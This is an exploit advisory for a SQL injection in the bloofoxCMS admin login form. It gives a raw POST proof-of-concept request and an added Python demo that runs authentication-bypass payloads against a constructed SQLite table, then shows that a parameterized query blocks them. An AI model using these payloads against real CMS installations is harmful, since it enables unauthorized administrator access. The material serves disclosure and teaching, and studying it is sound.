BloofoxCMS – ‘/bloofox/admin/index.php?Username’ SQL Injection

  • Author: AtT4CKxT3rR0r1ST
    Date: 2014-01-17
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/39030/
  • Source: https://www.securityfocus.com/bid/65019/info
     
    bloofoxCMS is prone to the following security vulnerabilities:
     
    1. Multiple SQL-injection vulnerabilities
    2. Multiple cross-site request forgery vulnerabilities
    3. A local file-include vulnerability
     
    Exploiting these issues could allow an attacker to execute arbitrary script code, steal cookie-based authentication credentials, obtain sensitive information, execute arbitrary server-side script code, or bypass certain security restrictions to perform unauthorized actions.
     
    bloofoxCMS 0.5.0 is vulnerable; other versions may also be affected. 
    
    Vulnerable endpoint: http://localhost/bloofox/admin/index.php (the username POST parameter of the admin login form; this is the first of the issues listed above). The request below is the proof of concept:
    
    
    POST /bloofox/admin/index.php HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://localhost/bloofox/admin/
    Cookie:
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 41
    
    action=login&password=IPHOBOS&username=[SQL INJECTION]
    
    Replace [SQL INJECTION] with the actual payload and set Content-Length to the byte length of the resulting body; the value 41 above is a placeholder from the original request and will not match once a payload is substituted.
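To make the injection concrete, the following is an added example written for this page; it is neither the advisory author's code nor bloofoxCMS's own source, which the page does not show. It assumes the login handler concatenates the username into a query of the form SELECT ... WHERE username = '...' AND password = '<hash>' (an assumption, not a fact from the page), reproduces that handler against a constructed in-memory SQLite user table, builds the same form body the request above sends, and shows the authentication bypass succeeding against the concatenated query and failing against a parameterized one.

```python
import hashlib
import sqlite3
from typing import Optional, Tuple
from urllib.parse import urlencode

# Constructed sample users; not bloofoxCMS's real schema or accounts.
SAMPLE_USERS = [
    ("admin", "s3cr3t-admin-pw"),
    ("editor", "editor-pw"),
]

# Hypothetical payloads: the first comments out the password check for a
# known username, the second matches the first row regardless of username.
PAYLOAD_KNOWN_USER = "admin' -- "
PAYLOAD_ANY_ROW = "' OR 1=1 -- "


def sha256_hex(s: str) -> str:
    """Stand-in for whatever hashing the CMS applies to passwords (assumed)."""
    return hashlib.sha256(s.encode("utf-8")).hexdigest()


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the CMS user table, filled with the constructed sample users."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [(u, sha256_hex(p)) for u, p in SAMPLE_USERS],
    )
    conn.commit()
    return conn


def build_login_body(username: str, password: str) -> Tuple[str, int]:
    """Build the form body from the advisory's request (action=login&password=...&username=...)
    and return it with the Content-Length a client must send for it."""
    body = urlencode([("action", "login"), ("password", password), ("username", username)])
    return body, len(body.encode("utf-8"))


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> Optional[Tuple[int, str]]:
    """Assumed shape of the flawed handler: the username is pasted straight into the SQL text,
    so a quote followed by a comment marker ends the WHERE clause early."""
    sql = (
        "SELECT user_id, username FROM users "
        f"WHERE username = '{username}' AND password = '{sha256_hex(password)}'"
    )
    return conn.execute(sql).fetchone()


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> Optional[Tuple[int, str]]:
    """Hardened form: bound parameters, so the payload is compared as a literal string."""
    sql = "SELECT user_id, username FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, sha256_hex(password))).fetchone()


if __name__ == "__main__":
    db = make_db()
    body, length = build_login_body(PAYLOAD_KNOWN_USER, "IPHOBOS")
    print("POST body:", body, "(Content-Length:", length, ")")
    print("vulnerable handler:", login_vulnerable(db, PAYLOAD_KNOWN_USER, "IPHOBOS"))
    print("parameterized handler:", login_safe(db, PAYLOAD_KNOWN_USER, "IPHOBOS"))
```

The trailing space after the comment marker in both payloads matters on some database engines (MySQL requires whitespace after `--`), which is why it is kept in the literals; urlencode turns it into `+` in the POST body, exactly as a browser would.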